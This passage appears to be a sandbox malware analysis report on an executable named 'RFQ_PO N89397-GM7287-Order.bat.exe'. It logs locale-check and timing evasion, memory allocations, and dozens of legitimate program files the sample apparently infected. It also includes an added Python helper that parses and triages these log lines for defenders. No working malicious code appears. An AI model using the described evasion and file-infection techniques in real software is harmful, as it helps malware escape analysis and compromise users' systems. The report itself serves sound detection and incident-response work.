                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process information set: NOOPENFILEERRORBOX (37 identical entries)
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe Process information set: NOOPENFILEERRORBOX (43 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process information set: NOOPENFILEERRORBOX (58 identical entries)

                  Malware Analysis System Evasion

Source: Yara match; File source: Process Memory Space: RFQ_PO N89397-GM7287-Order.bat.exe PID: 7316, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: YRtQgzFlDnVSru.exe PID: 2648, type: MEMORYSTR
Source: C:\Windows\System32\AppVClient.exe Code function: 15_2_00B652A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 15_2_00B652A0
Source: C:\Windows\System32\FXSSVC.exe Code function: 17_2_004252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 17_2_004252A0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 18_2_008952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 18_2_008952A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 19_2_00D152A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 19_2_00D152A0
Source: C:\Windows\System32\msdtc.exe Code function: 20_2_005552A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 20_2_005552A0
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Code function: 21_2_00B152A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 21_2_00B152A0
Source: C:\Windows\System32\Locator.exe Code function: 24_2_004C52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 24_2_004C52A0
Source: C:\Windows\System32\SensorDataService.exe Code function: 25_2_006C52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 25_2_006C52A0
Source: C:\Windows\System32\snmptrap.exe Code function: 26_2_006852A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 26_2_006852A0
Source: C:\Windows\System32\Spectrum.exe Code function: 27_2_005252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 27_2_005252A0
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe Code function: 28_2_004E52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 28_2_004E52A0
Source: C:\Windows\System32\TieringEngineService.exe Code function: 30_2_007D52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 30_2_007D52A0
Source: C:\Windows\System32\AgentService.exe Code function: 31_2_00BC52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 31_2_00BC52A0
Source: C:\Windows\System32\vds.exe Code function: 33_2_00B752A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 33_2_00B752A0
Source: C:\Windows\System32\wbengine.exe Code function: 35_2_00AF52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 35_2_00AF52A0
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe Memory allocated: 30B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe Memory allocated: 3220000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe Memory allocated: 5220000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe Memory allocated: 58E0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe Memory allocated: 68E0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe Memory allocated: 6A10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe Memory allocated: 7A10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe Memory allocated: B920000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe Memory allocated: C920000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe Memory allocated: CDB0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe Memory allocated: DDB0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Memory allocated: 7500000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Memory allocated: 7770000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Memory allocated: 75B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe Memory allocated: 840000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe Memory allocated: 2680000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe Memory allocated: 23B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe Memory allocated: 4BF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe Memory allocated: 5BF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe Memory allocated: 5D20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe Memory allocated: 6D20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe Memory allocated: ABE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe Memory allocated: BBE0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Memory allocated: 74B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Memory allocated: 7740000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Memory allocated: 74F0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_004A95E4 rdtsc 9_2_004A95E4
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4098
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4351
Source: C:\Windows\System32\msdtc.exe Window / User API: threadDelayed 469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Window / User API: threadDelayed 1856
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Window / User API: threadDelayed 8110
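The entries in this group carry very different weight, and a triage script should separate them. The GetSystemDefaultLangID / `lea ecx, [eax-419h]` pattern found in the infected host processes subtracts 0x0419, the Windows LANGID for Russian (primary language 0x19, sublanguage 0x01; Kazakh is 0x043F), which is the check behind the "behave differently on a Russian/Kazak computer" signature. The delay value 922337203685477 is Int64.MaxValue ticks divided by 10,000 ticks per millisecond, i.e. TimeSpan.MaxValue in milliseconds, the value the .NET runtime uses for an infinite wait; the powershell.exe instances hit it as well, so on its own it is not evidence of an evasion sleep, whereas the rdtsc call and the large threadDelayed counts in vbc.exe are. The Python below is an added triage helper written for this page; it is not part of the Joe Sandbox report or of the sample. It parses lines in the format used in this section (a constructed sample of nine lines copied from the report), decodes the LANGID being compared, separates the infinite-wait artefact from real delays, and groups the dropped-but-never-started executables by top-level directory. The event names it matches and the small `PRIMARY_LANG_NAMES` table are assumptions limited to what this report shows.

```python
"""Added triage helper for Joe Sandbox 'Malware Analysis System Evasion' lines.
Not part of the report or the sample; the event names below are taken from this
report only and are an assumption for any other report layout."""
import re
from collections import defaultdict

# Constructed sample input: nine lines copied from the report section above.
SAMPLE_LINES = r"""
Source: C:\Windows\System32\AppVClient.exe Code function: 15_2_00B652A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 15_2_00B652A0
Source: C:\Windows\System32\msdtc.exe Code function: 20_2_005552A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] 20_2_005552A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_004A95E4 rdtsc 9_2_004A95E4
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Window / User API: threadDelayed 8110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe
"""

# Paths may contain spaces, so the source is matched lazily up to a known event name.
EVENT_RE = re.compile(
    r"^Source: (?P<source>.+?) "
    r"(?P<event>Code function|Thread delayed|Window / User API|"
    r"Dropped PE file which has not been started|Memory allocated): "
    r"(?P<detail>.*)$"
)
# The disassembly Joe prints for the locale check: GetSystemDefaultLangID followed by
# 'lea ecx, [eax-<LANGID>h]'; eax - LANGID == 0 means the system locale matches.
LANGID_CMP_RE = re.compile(
    r"GetSystemDefaultLangID, lea ecx, dword ptr \[eax-(?P<hex>[0-9A-Fa-f]+)h\]"
)
# LANGID layout (winnt.h MAKELANGID): bits 0-9 primary language, bits 10-15 sublanguage.
PRIMARY_LANG_NAMES = {0x19: "LANG_RUSSIAN", 0x3F: "LANG_KAZAK"}  # only the two this report concerns
# Int64.MaxValue ticks / 10,000 ticks per ms = TimeSpan.MaxValue in milliseconds, the
# value the .NET runtime uses for an infinite wait; benign .NET processes show it too.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000  # 922337203685477


def parse_line(line: str):
    """Split one report line into source process, event name and detail, or None."""
    m = EVENT_RE.match(line.strip())
    return m.groupdict() if m else None


def decode_langid(langid: int) -> dict:
    """Decode a Windows LANGID into its primary-language and sublanguage parts."""
    primary = langid & 0x3FF
    return {"langid": langid, "primary": primary, "sublang": langid >> 10,
            "name": PRIMARY_LANG_NAMES.get(primary, "unknown")}


def triage(text: str) -> dict:
    """Summarise the evasion group: which hosts compare the locale, which use rdtsc,
    which delays are the runtime's infinite-wait artefact versus real sleeps, and
    which dropped (infected) PE files were never executed, grouped by top directory."""
    summary = {
        "langid_checks": {},                       # host process -> decoded LANGID compared
        "rdtsc_hosts": set(),
        "infinite_wait_hosts": set(),              # TimeSpan.MaxValue waits: weak signal
        "finite_sleep_ms": defaultdict(list),      # host -> real 'Thread delayed' values
        "thread_delay_counts": defaultdict(list),  # host -> 'threadDelayed N' counts
        "dropped_not_started": defaultdict(list),  # top-level dir -> dropped files
    }
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        src, event, detail = rec["source"], rec["event"], rec["detail"]
        if event == "Code function":
            m = LANGID_CMP_RE.search(detail)
            if m:
                summary["langid_checks"][src] = decode_langid(int(m.group("hex"), 16))
            elif " rdtsc " in f" {detail} ":
                summary["rdtsc_hosts"].add(src)
        elif event == "Thread delayed":
            ms = int(detail.rsplit(" ", 1)[1])
            if ms == TIMESPAN_MAX_MS:
                summary["infinite_wait_hosts"].add(src)
            else:
                summary["finite_sleep_ms"][src].append(ms)
        elif event == "Window / User API" and detail.startswith("threadDelayed "):
            summary["thread_delay_counts"][src].append(int(detail.split()[1]))
        elif event == "Dropped PE file which has not been started":
            top_dir = "\\".join(detail.split("\\")[:2])  # e.g. C:\Program Files
            summary["dropped_not_started"][top_dir].append(detail)
    return summary


if __name__ == "__main__":
    s = triage(SAMPLE_LINES)
    for host, lang in s["langid_checks"].items():
        print(f"{host}: compares LANGID 0x{lang['langid']:04X} ({lang['name']})")
    print("rdtsc:", sorted(s["rdtsc_hosts"]))
    print("infinite-wait artefact only:", sorted(s["infinite_wait_hosts"]))
    print("threadDelayed counts:", dict(s["thread_delay_counts"]))
    for d, files in s["dropped_not_started"].items():
        print(f"{len(files)} infected PE file(s) never started under {d}")
```

Run it against the full report text rather than the constructed sample to get the complete list of hosts carrying the locale check (every service the sample infected) and of third-party executables it overwrote, which is the list to re-image or restore from a known-good package.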
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeDropped PE file which has not been started: C:\Windows\System32\sppsvc.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
